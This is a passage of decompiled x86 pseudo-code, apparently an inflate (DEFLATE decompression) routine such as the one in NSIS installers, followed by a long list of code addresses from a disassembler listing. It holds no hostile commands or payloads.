                                                                          													goto L182;
                                                                          												}
                                                                          												L128:
                                                                          												__ecx =  *(__ebp - 0x38);
                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                          												__ecx = __ebx;
                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          												__ebx = __ebx + 8;
                                                                          												__eflags = __ebx;
                                                                          											}
                                                                          											L130:
                                                                          											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                          											__esi[3] = __esi[3] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                          											__ecx = __eax;
                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                          											__ebx = __ebx - __eax;
                                                                          											__eflags = __ebx;
                                                                          											 *__esi = 5;
                                                                          											goto L131;
                                                                          										case 5:
                                                                          											L131:
                                                                          											__eax =  *(__ebp - 0x30);
                                                                          											__edx = __esi[3];
                                                                          											__eax = __eax - __esi;
                                                                          											__ecx = __eax - __esi - 0x1ba0;
                                                                          											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                          											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                          												__ecx = __eax;
                                                                          												__ecx = __eax - __edx;
                                                                          												__eflags = __ecx;
                                                                          											} else {
                                                                          												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                          												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                          												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                          											}
                                                                          											__eflags = __esi[1];
                                                                          											 *(__ebp - 0x20) = __ecx;
                                                                          											if(__esi[1] != 0) {
                                                                          												L135:
                                                                          												__edi =  *(__ebp - 0x2c);
                                                                          												do {
                                                                          													L136:
                                                                          													__eflags = __edi;
                                                                          													if(__edi != 0) {
                                                                          														goto L152;
                                                                          													}
                                                                          													L137:
                                                                          													__edi = __esi[0x26e8];
                                                                          													__eflags = __eax - __edi;
                                                                          													if(__eax != __edi) {
                                                                          														L143:
                                                                          														__esi[0x26ea] = __eax;
                                                                          														__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                          														__eax = __esi[0x26ea];
                                                                          														__ecx = __esi[0x26e9];
                                                                          														__eflags = __eax - __ecx;
                                                                          														 *(__ebp - 0x30) = __eax;
                                                                          														if(__eax >= __ecx) {
                                                                          															__edi = __esi[0x26e8];
                                                                          															__edi = __esi[0x26e8] - __eax;
                                                                          															__eflags = __edi;
                                                                          														} else {
                                                                          															__ecx = __ecx - __eax;
                                                                          															__edi = __ecx - __eax - 1;
                                                                          														}
                                                                          														__edx = __esi[0x26e8];
                                                                          														__eflags = __eax - __edx;
                                                                          														 *(__ebp - 8) = __edx;
                                                                          														if(__eax == __edx) {
                                                                          															__edx =  &(__esi[0x6e8]);
                                                                          															__eflags = __ecx - __edx;
                                                                          															if(__ecx != __edx) {
                                                                          																__eax = __edx;
                                                                          																__eflags = __eax - __ecx;
                                                                          																 *(__ebp - 0x30) = __eax;
                                                                          																if(__eax >= __ecx) {
                                                                          																	__edi =  *(__ebp - 8);
                                                                          																	__edi =  *(__ebp - 8) - __eax;
                                                                          																	__eflags = __edi;
                                                                          																} else {
                                                                          																	__ecx = __ecx - __eax;
                                                                          																	__edi = __ecx;
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          														__eflags = __edi;
                                                                          														if(__edi == 0) {
                                                                          															goto L183;
                                                                          														} else {
                                                                          															goto L152;
                                                                          														}
                                                                          													}
                                                                          													L138:
                                                                          													__ecx = __esi[0x26e9];
                                                                          													__edx =  &(__esi[0x6e8]);
                                                                          													__eflags = __ecx - __edx;
                                                                          													if(__ecx == __edx) {
                                                                          														goto L143;
                                                                          													}
                                                                          													L139:
                                                                          													__eax = __edx;
                                                                          													__eflags = __eax - __ecx;
                                                                          													if(__eax >= __ecx) {
                                                                          														__edi = __edi - __eax;
                                                                          														__eflags = __edi;
                                                                          													} else {
                                                                          														__ecx = __ecx - __eax;
                                                                          														__edi = __ecx;
                                                                          													}
                                                                          													__eflags = __edi;
                                                                          													if(__edi == 0) {
                                                                          														goto L143;
                                                                          													}
                                                                          													L152:
                                                                          													__ecx =  *(__ebp - 0x20);
                                                                          													 *__eax =  *__ecx;
                                                                          													__eax = __eax + 1;
                                                                          													__ecx = __ecx + 1;
                                                                          													__edi = __edi - 1;
                                                                          													__eflags = __ecx - __esi[0x26e8];
                                                                          													 *(__ebp - 0x30) = __eax;
                                                                          													 *(__ebp - 0x20) = __ecx;
                                                                          													 *(__ebp - 0x2c) = __edi;
                                                                          													if(__ecx == __esi[0x26e8]) {
                                                                          														__ecx =  &(__esi[0x6e8]);
                                                                          														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                          													}
                                                                          													_t357 =  &(__esi[1]);
                                                                          													 *_t357 = __esi[1] - 1;
                                                                          													__eflags =  *_t357;
                                                                          												} while ( *_t357 != 0);
                                                                          											}
                                                                          											goto L23;
                                                                          										case 6:
                                                                          											L156:
                                                                          											__eax =  *(__ebp - 0x2c);
                                                                          											__edi =  *(__ebp - 0x30);
                                                                          											__eflags = __eax;
                                                                          											if(__eax != 0) {
                                                                          												L172:
                                                                          												__cl = __esi[2];
                                                                          												 *__edi = __cl;
                                                                          												__edi = __edi + 1;
                                                                          												__eax = __eax - 1;
                                                                          												 *(__ebp - 0x30) = __edi;
                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                          												goto L23;
                                                                          											}
                                                                          											L157:
                                                                          											__ecx = __esi[0x26e8];
                                                                          											__eflags = __edi - __ecx;
                                                                          											if(__edi != __ecx) {
                                                                          												L163:
                                                                          												__esi[0x26ea] = __edi;
                                                                          												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                          												__edi = __esi[0x26ea];
                                                                          												__ecx = __esi[0x26e9];
                                                                          												__eflags = __edi - __ecx;
                                                                          												 *(__ebp - 0x30) = __edi;
                                                                          												if(__edi >= __ecx) {
                                                                          													__eax = __esi[0x26e8];
                                                                          													__eax = __esi[0x26e8] - __edi;
                                                                          													__eflags = __eax;
                                                                          												} else {
                                                                          													__ecx = __ecx - __edi;
                                                                          													__eax = __ecx - __edi - 1;
                                                                          												}
                                                                          												__edx = __esi[0x26e8];
                                                                          												__eflags = __edi - __edx;
                                                                          												 *(__ebp - 8) = __edx;
                                                                          												if(__edi == __edx) {
                                                                          													__edx =  &(__esi[0x6e8]);
                                                                          													__eflags = __ecx - __edx;
                                                                          													if(__ecx != __edx) {
                                                                          														__edi = __edx;
                                                                          														__eflags = __edi - __ecx;
                                                                          														 *(__ebp - 0x30) = __edi;
                                                                          														if(__edi >= __ecx) {
                                                                          															__eax =  *(__ebp - 8);
                                                                          															__eax =  *(__ebp - 8) - __edi;
                                                                          															__eflags = __eax;
                                                                          														} else {
                                                                          															__ecx = __ecx - __edi;
                                                                          															__eax = __ecx;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          												__eflags = __eax;
                                                                          												if(__eax == 0) {
                                                                          													goto L183;
                                                                          												} else {
                                                                          													goto L172;
                                                                          												}
                                                                          											}
                                                                          											L158:
                                                                          											__eax = __esi[0x26e9];
                                                                          											__edx =  &(__esi[0x6e8]);
                                                                          											__eflags = __eax - __edx;
                                                                          											if(__eax == __edx) {
                                                                          												goto L163;
                                                                          											}
                                                                          											L159:
                                                                          											__edi = __edx;
                                                                          											__eflags = __edi - __eax;
                                                                          											if(__edi >= __eax) {
                                                                          												__ecx = __ecx - __edi;
                                                                          												__eflags = __ecx;
                                                                          												__eax = __ecx;
                                                                          											} else {
                                                                          												__eax = __eax - __edi;
                                                                          												__eax = __eax - 1;
                                                                          											}
                                                                          											__eflags = __eax;
                                                                          											if(__eax != 0) {
                                                                          												goto L172;
                                                                          											} else {
                                                                          												goto L163;
                                                                          											}
                                                                          										case 7:
                                                                          											L173:
                                                                          											__eflags = __ebx - 7;
                                                                          											if(__ebx > 7) {
                                                                          												__ebx = __ebx - 8;
                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                          												_t380 = __ebp - 0x38;
                                                                          												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                          												__eflags =  *_t380;
                                                                          											}
                                                                          											goto L175;
                                                                          										case 8:
                                                                          											L4:
                                                                          											while(_t425 < 3) {
                                                                          												if( *(_t448 - 0x34) == 0) {
                                                                          													goto L182;
                                                                          												} else {
                                                                          													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                          													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                          													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                          													_t425 = _t425 + 8;
                                                                          													continue;
                                                                          												}
                                                                          											}
                                                                          											_t425 = _t425 - 3;
                                                                          											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                          											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                          											asm("sbb ecx, ecx");
                                                                          											_t408 = _t406 >> 1;
                                                                          											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                          											if(_t408 == 0) {
                                                                          												L24:
                                                                          												 *_t446 = 9;
                                                                          												_t436 = _t425 & 0x00000007;
                                                                          												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                          												_t425 = _t425 - _t436;
                                                                          												goto L180;
                                                                          											}
                                                                          											L6:
                                                                          											_t411 = _t408 - 1;
                                                                          											if(_t411 == 0) {
                                                                          												L13:
                                                                          												__eflags =  *0x432e70;
                                                                          												if( *0x432e70 != 0) {
                                                                          													L22:
                                                                          													_t412 =  *0x40a5c8; // 0x9
                                                                          													_t446[4] = _t412;
                                                                          													_t413 =  *0x40a5cc; // 0x5
                                                                          													_t446[4] = _t413;
                                                                          													_t414 =  *0x431cec; // 0x0
                                                                          													_t446[5] = _t414;
                                                                          													_t415 =  *0x431ce8; // 0x0
                                                                          													_t446[6] = _t415;
                                                                          													L23:
                                                                          													 *_t446 =  *_t446 & 0x00000000;
                                                                          													goto L180;
                                                                          												} else {
                                                                          													_t26 = _t448 - 8;
                                                                          													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                          													__eflags =  *_t26;
                                                                          													_t416 = 0x431cf0;
                                                                          													goto L15;
                                                                          													L20:
                                                                          													 *_t416 = _t438;
                                                                          													_t416 = _t416 + 4;
                                                                          													__eflags = _t416 - 0x432170;
                                                                          													if(_t416 < 0x432170) {
                                                                          														L15:
                                                                          														__eflags = _t416 - 0x431f2c;
                                                                          														_t438 = 8;
                                                                          														if(_t416 > 0x431f2c) {
                                                                          															__eflags = _t416 - 0x4320f0;
                                                                          															if(_t416 >= 0x4320f0) {
                                                                          																__eflags = _t416 - 0x432150;
                                                                          																if(_t416 < 0x432150) {
                                                                          																	_t438 = 7;
                                                                          																}
                                                                          															} else {
                                                                          																_t438 = 9;
                                                                          															}
                                                                          														}
                                                                          														goto L20;
                                                                          													} else {
                                                                          														E004072B4(0x431cf0, 0x120, 0x101, 0x4084e0, 0x408520, 0x431cec, 0x40a5c8, 0x4325f0, _t448 - 8);
                                                                          														_push(0x1e);
                                                                          														_pop(_t440);
                                                                          														_push(5);
                                                                          														_pop(_t419);
                                                                          														memset(0x431cf0, _t419, _t440 << 2);
                                                                          														_t450 = _t450 + 0xc;
                                                                          														_t442 = 0x431cf0 + _t440;
                                                                          														E004072B4(0x431cf0, 0x1e, 0, 0x408560, 0x40859c, 0x431ce8, 0x40a5cc, 0x4325f0, _t448 - 8);
                                                                          														 *0x432e70 =  *0x432e70 + 1;
                                                                          														__eflags =  *0x432e70;
                                                                          														goto L22;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          											L7:
                                                                          											_t423 = _t411 - 1;
                                                                          											if(_t423 == 0) {
                                                                          												 *_t446 = 0xb;
                                                                          												goto L180;
                                                                          											}
                                                                          											L8:
                                                                          											if(_t423 != 1) {
                                                                          												goto L180;
                                                                          											}
                                                                          											goto L9;
                                                                          										case 9:
                                                                          											while(1) {
                                                                          												L27:
                                                                          												__eflags = __ebx - 0x20;
                                                                          												if(__ebx >= 0x20) {
                                                                          													break;
                                                                          												}
                                                                          												L25:
                                                                          												__eflags =  *(__ebp - 0x34);
                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                          													goto L182;
                                                                          												}
                                                                          												L26:
                                                                          												__eax =  *(__ebp - 0x38);
                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          												__ecx = __ebx;
                                                                          												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          												__ebx = __ebx + 8;
                                                                          												__eflags = __ebx;
                                                                          											}
                                                                          											L28:
                                                                          											__eax =  *(__ebp - 0x40);
                                                                          											__ebx = 0;
                                                                          											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                          											 *(__ebp - 0x40) = 0;
                                                                          											__eflags = __eax;
                                                                          											__esi[1] = __eax;
                                                                          											if(__eax == 0) {
                                                                          												goto L53;
                                                                          											}
                                                                          											L29:
                                                                          											_push(0xa);
                                                                          											_pop(__eax);
                                                                          											goto L54;
                                                                          										case 0xa:
                                                                          											L30:
                                                                          											__eflags =  *(__ebp - 0x34);
                                                                          											if( *(__ebp - 0x34) == 0) {
                                                                          												goto L182;
                                                                          											}
                                                                          											L31:
                                                                          											__eax =  *(__ebp - 0x2c);
                                                                          											__eflags = __eax;
                                                                          											if(__eax != 0) {
                                                                          												L48:
                                                                          												__eflags = __eax -  *(__ebp - 0x34);
                                                                          												if(__eax >=  *(__ebp - 0x34)) {
                                                                          													__eax =  *(__ebp - 0x34);
                                                                          												}
                                                                          												__ecx = __esi[1];
                                                                          												__eflags = __ecx - __eax;
                                                                          												__edi = __ecx;
                                                                          												if(__ecx >= __eax) {
                                                                          													__edi = __eax;
                                                                          												}
                                                                          												__eax = E00405D2F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                          												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                          												_t80 =  &(__esi[1]);
                                                                          												 *_t80 = __esi[1] - __edi;
                                                                          												__eflags =  *_t80;
                                                                          												if( *_t80 == 0) {
                                                                          													L53:
                                                                          													__eax = __esi[0x145];
                                                                          													L54:
                                                                          													 *__esi = __eax;
                                                                          												}
                                                                          												goto L180;
                                                                          											}
                                                                          											L32:
                                                                          											__ecx = __esi[0x26e8];
                                                                          											__edx =  *(__ebp - 0x30);
                                                                          											__eflags = __edx - __ecx;
                                                                          											if(__edx != __ecx) {
                                                                          												L38:
                                                                          												__esi[0x26ea] = __edx;
                                                                          												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                          												__edx = __esi[0x26ea];
                                                                          												__ecx = __esi[0x26e9];
                                                                          												__eflags = __edx - __ecx;
                                                                          												 *(__ebp - 0x30) = __edx;
                                                                          												if(__edx >= __ecx) {
                                                                          													__eax = __esi[0x26e8];
                                                                          													__eax = __esi[0x26e8] - __edx;
                                                                          													__eflags = __eax;
                                                                          												} else {
                                                                          													__ecx = __ecx - __edx;
                                                                          													__eax = __ecx - __edx - 1;
                                                                          												}
                                                                          												__edi = __esi[0x26e8];
                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                          												__eflags = __edx - __edi;
                                                                          												if(__edx == __edi) {
                                                                          													__edx =  &(__esi[0x6e8]);
                                                                          													__eflags = __edx - __ecx;
                                                                          													if(__eflags != 0) {
                                                                          														 *(__ebp - 0x30) = __edx;
                                                                          														if(__eflags >= 0) {
                                                                          															__edi = __edi - __edx;
                                                                          															__eflags = __edi;
                                                                          															__eax = __edi;
                                                                          														} else {
                                                                          															__ecx = __ecx - __edx;
                                                                          															__eax = __ecx;
                                                                          														}
                                                                          														 *(__ebp - 0x2c) = __eax;
                                                                          													}
                                                                          												}
                                                                          												__eflags = __eax;
                                                                          												if(__eax == 0) {
                                                                          													goto L183;
                                                                          												} else {
                                                                          													goto L48;
                                                                          												}
                                                                          											}
                                                                          											L33:
                                                                          											__eax = __esi[0x26e9];
                                                                          											__edi =  &(__esi[0x6e8]);
                                                                          											__eflags = __eax - __edi;
                                                                          											if(__eax == __edi) {
                                                                          												goto L38;
                                                                          											}
                                                                          											L34:
                                                                          											__edx = __edi;
                                                                          											__eflags = __edx - __eax;
                                                                          											 *(__ebp - 0x30) = __edx;
                                                                          											if(__edx >= __eax) {
                                                                          												__ecx = __ecx - __edx;
                                                                          												__eflags = __ecx;
                                                                          												__eax = __ecx;
                                                                          											} else {
                                                                          												__eax = __eax - __edx;
                                                                          												__eax = __eax - 1;
                                                                          											}
                                                                          											__eflags = __eax;
                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                          											if(__eax != 0) {
                                                                          												goto L48;
                                                                          											} else {
                                                                          												goto L38;
                                                                          											}
                                                                          										case 0xb:
                                                                          											goto L56;
                                                                          										case 0xc:
                                                                          											L60:
                                                                          											__esi[1] = __esi[1] >> 0xa;
                                                                          											__eax = (__esi[1] >> 0xa) + 4;
                                                                          											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                          												goto L68;
                                                                          											}
                                                                          											goto L61;
                                                                          										case 0xd:
                                                                          											while(1) {
                                                                          												L93:
                                                                          												__eax = __esi[1];
                                                                          												__ecx = __esi[2];
                                                                          												__edx = __eax;
                                                                          												__eax = __eax & 0x0000001f;
                                                                          												__edx = __edx >> 5;
                                                                          												__eax = __edx + __eax + 0x102;
                                                                          												__eflags = __esi[2] - __eax;
                                                                          												if(__esi[2] >= __eax) {
                                                                          													break;
                                                                          												}
                                                                          												L73:
                                                                          												__eax = __esi[0x143];
                                                                          												while(1) {
                                                                          													L76:
                                                                          													__eflags = __ebx - __eax;
                                                                          													if(__ebx >= __eax) {
                                                                          														break;
                                                                          													}
                                                                          													L74:
                                                                          													__eflags =  *(__ebp - 0x34);
                                                                          													if( *(__ebp - 0x34) == 0) {
                                                                          														goto L182;
                                                                          													}
                                                                          													L75:
                                                                          													__ecx =  *(__ebp - 0x38);
                                                                          													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                          													__ecx = __ebx;
                                                                          													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          													__ebx = __ebx + 8;
                                                                          													__eflags = __ebx;
                                                                          												}
                                                                          												L77:
                                                                          												__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
                                                                          												__eax = __eax &  *(__ebp - 0x40);
                                                                          												__ecx = __esi[0x144];
                                                                          												__eax = __esi[0x144] + __eax * 4;
                                                                          												__edx =  *(__eax + 1) & 0x000000ff;
                                                                          												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                          												__eflags = __eax - 0x10;
                                                                          												 *(__ebp - 0x14) = __eax;
                                                                          												if(__eax >= 0x10) {
                                                                          													L79:
                                                                          													__eflags = __eax - 0x12;
                                                                          													if(__eax != 0x12) {
                                                                          														__eax = __eax + 0xfffffff2;
                                                                          														 *(__ebp - 8) = 3;
                                                                          													} else {
                                                                          														_push(7);
                                                                          														 *(__ebp - 8) = 0xb;
                                                                          														_pop(__eax);
                                                                          													}
                                                                          													while(1) {
                                                                          														L84:
                                                                          														__ecx = __eax + __edx;
                                                                          														__eflags = __ebx - __eax + __edx;
                                                                          														if(__ebx >= __eax + __edx) {
                                                                          															break;
                                                                          														}
                                                                          														L82:
                                                                          														__eflags =  *(__ebp - 0x34);
                                                                          														if( *(__ebp - 0x34) == 0) {
                                                                          															goto L182;
                                                                          														}
                                                                          														L83:
                                                                          														__ecx =  *(__ebp - 0x38);
                                                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                          														__ecx = __ebx;
                                                                          														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          														__ebx = __ebx + 8;
                                                                          														__eflags = __ebx;
                                                                          													}
                                                                          													L85:
                                                                          													__ecx = __edx;
                                                                          													__ebx = __ebx - __edx;
                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                          													 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                          													__edx =  *(__ebp - 8);
                                                                          													__ebx = __ebx - __eax;
                                                                          													__edx =  *(__ebp - 8) + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                          													__ecx = __eax;
                                                                          													__eax = __esi[1];
                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                          													__ecx = __esi[2];
                                                                          													__eax = __eax >> 5;
                                                                          													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                          													__eax = __eax & 0x0000001f;
                                                                          													__eax = __edi + __eax + 0x102;
                                                                          													__edi = __edx + __ecx;
                                                                          													__eflags = __edx + __ecx - __eax;
                                                                          													if(__edx + __ecx > __eax) {
                                                                          														goto L9;
                                                                          													}
                                                                          													L86:
                                                                          													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                          													if( *(__ebp - 0x14) != 0x10) {
                                                                          														L89:
                                                                          														__edi = 0;
                                                                          														__eflags = 0;
                                                                          														L90:
                                                                          														__eax = __esi + 0xc + __ecx * 4;
                                                                          														do {
                                                                          															L91:
                                                                          															 *__eax = __edi;
                                                                          															__ecx = __ecx + 1;
                                                                          															__eax = __eax + 4;
                                                                          															__edx = __edx - 1;
                                                                          															__eflags = __edx;
                                                                          														} while (__edx != 0);
                                                                          														__esi[2] = __ecx;
                                                                          														continue;
                                                                          													}
                                                                          													L87:
                                                                          													__eflags = __ecx - 1;
                                                                          													if(__ecx < 1) {
                                                                          														goto L9;
                                                                          													}
                                                                          													L88:
                                                                          													__edi =  *(__esi + 8 + __ecx * 4);
                                                                          													goto L90;
                                                                          												}
                                                                          												L78:
                                                                          												__ecx = __edx;
                                                                          												__ebx = __ebx - __edx;
                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                          												__ecx = __esi[2];
                                                                          												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                          												__esi[2] = __esi[2] + 1;
                                                                          											}
                                                                          											L94:
                                                                          											__eax = __esi[1];
                                                                          											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                          											__edi = __eax;
                                                                          											__eax = __eax >> 5;
                                                                          											__edi = __edi & 0x0000001f;
                                                                          											__ecx = 0x101;
                                                                          											__eax = __eax & 0x0000001f;
                                                                          											__edi = __edi + 0x101;
                                                                          											__eax = __eax + 1;
                                                                          											__edx = __ebp - 0xc;
                                                                          											 *(__ebp - 0x14) = __eax;
                                                                          											 &(__esi[0x148]) = __ebp - 4;
                                                                          											 *(__ebp - 4) = 9;
                                                                          											__ebp - 0x18 =  &(__esi[3]);
                                                                          											 *(__ebp - 0x10) = 6;
                                                                          											__eax = E004072B4( &(__esi[3]), __edi, 0x101, 0x4084e0, 0x408520, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                          											__eflags =  *(__ebp - 4);
                                                                          											if( *(__ebp - 4) == 0) {
                                                                          												__eax = __eax | 0xffffffff;
                                                                          												__eflags = __eax;
                                                                          											}
                                                                          											__eflags = __eax;
                                                                          											if(__eax != 0) {
                                                                          												goto L9;
                                                                          											} else {
                                                                          												L97:
                                                                          												__ebp - 0xc =  &(__esi[0x148]);
                                                                          												__ebp - 0x10 = __ebp - 0x1c;
                                                                          												__eax = __esi + 0xc + __edi * 4;
                                                                          												__eax = E004072B4(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408560, 0x40859c, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                          												__eflags = __eax;
                                                                          												if(__eax != 0) {
                                                                          													goto L9;
                                                                          												}
                                                                          												L98:
                                                                          												__eax =  *(__ebp - 0x10);
                                                                          												__eflags =  *(__ebp - 0x10);
                                                                          												if( *(__ebp - 0x10) != 0) {
                                                                          													L100:
                                                                          													__cl =  *(__ebp - 4);
                                                                          													 *__esi =  *__esi & 0x00000000;
                                                                          													__eflags =  *__esi;
                                                                          													__esi[4] = __al;
                                                                          													__eax =  *(__ebp - 0x18);
                                                                          													__esi[5] =  *(__ebp - 0x18);
                                                                          													__eax =  *(__ebp - 0x1c);
                                                                          													__esi[4] = __cl;
                                                                          													__esi[6] =  *(__ebp - 0x1c);
                                                                          													goto L101;
                                                                          												}
                                                                          												L99:
                                                                          												__eflags = __edi - 0x101;
                                                                          												if(__edi > 0x101) {
                                                                          													goto L9;
                                                                          												}
                                                                          												goto L100;
                                                                          											}
                                                                          										case 0xe:
                                                                          											goto L9;
                                                                          										case 0xf:
                                                                          											L175:
                                                                          											__eax =  *(__ebp - 0x30);
                                                                          											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                          											__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                          											__ecx = __esi[0x26ea];
                                                                          											__edx = __esi[0x26e9];
                                                                          											__eflags = __ecx - __edx;
                                                                          											 *(__ebp - 0x30) = __ecx;
                                                                          											if(__ecx >= __edx) {
                                                                          												__eax = __esi[0x26e8];
                                                                          												__eax = __esi[0x26e8] - __ecx;
                                                                          												__eflags = __eax;
                                                                          											} else {
                                                                          												__edx = __edx - __ecx;
                                                                          												__eax = __edx - __ecx - 1;
                                                                          											}
                                                                          											__eflags = __ecx - __edx;
                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                          											if(__ecx != __edx) {
                                                                          												L183:
                                                                          												__edi = 0;
                                                                          												goto L10;
                                                                          											} else {
                                                                          												L179:
                                                                          												__eax = __esi[0x145];
                                                                          												__eflags = __eax - 8;
                                                                          												 *__esi = __eax;
                                                                          												if(__eax != 8) {
                                                                          													L184:
                                                                          													0 = 1;
                                                                          													goto L10;
                                                                          												}
                                                                          												goto L180;
                                                                          											}
                                                                          									}
                                                                          								}
                                                                          								L181:
                                                                          								goto L9;
                                                                          							}
                                                                          							L70:
                                                                          							if( *__edi == __eax) {
                                                                          								goto L72;
                                                                          							}
                                                                          							L71:
                                                                          							__esi[2] = __esi[2] & __eax;
                                                                          							 *__esi = 0xd;
                                                                          							goto L93;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				L182:
                                                                          				_t443 = 0;
                                                                          				_t446[0x147] =  *(_t448 - 0x40);
                                                                          				_t446[0x146] = _t425;
                                                                          				( *(_t448 + 8))[1] = 0;
                                                                          				goto L11;
                                                                          			}









                                                                          0x00406be1
                                                                          0x00406be7
                                                                          0x00406bee
                                                                          0x00406c02
                                                                          0x00406c02
                                                                          0x004071d1
                                                                          0x004071d1
                                                                          0x004071d1
                                                                          0x004071d6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040680e
                                                                          0x0040680e
                                                                          0x00000000
                                                                          0x00406e09
                                                                          0x00406e09
                                                                          0x00406e0d
                                                                          0x00406e10
                                                                          0x00406e13
                                                                          0x00406e16
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406e1c
                                                                          0x00406e1c
                                                                          0x00406e41
                                                                          0x00406e41
                                                                          0x00406e41
                                                                          0x00406e43
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406e21
                                                                          0x00406e21
                                                                          0x00406e25
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406e2b
                                                                          0x00406e2b
                                                                          0x00406e2e
                                                                          0x00406e31
                                                                          0x00406e34
                                                                          0x00406e36
                                                                          0x00406e38
                                                                          0x00406e3b
                                                                          0x00406e3e
                                                                          0x00406e3e
                                                                          0x00406e3e
                                                                          0x00406e45
                                                                          0x00406e45
                                                                          0x00406e4d
                                                                          0x00406e50
                                                                          0x00406e53
                                                                          0x00406e56
                                                                          0x00406e5a
                                                                          0x00406e5d
                                                                          0x00406e5f
                                                                          0x00406e62
                                                                          0x00406e64
                                                                          0x00406e78
                                                                          0x00406e78
                                                                          0x00406e7b
                                                                          0x00406e95
                                                                          0x00406e95
                                                                          0x00406e98
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406e9e
                                                                          0x00406e9e
                                                                          0x00406ea1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406ea7
                                                                          0x00406ea7
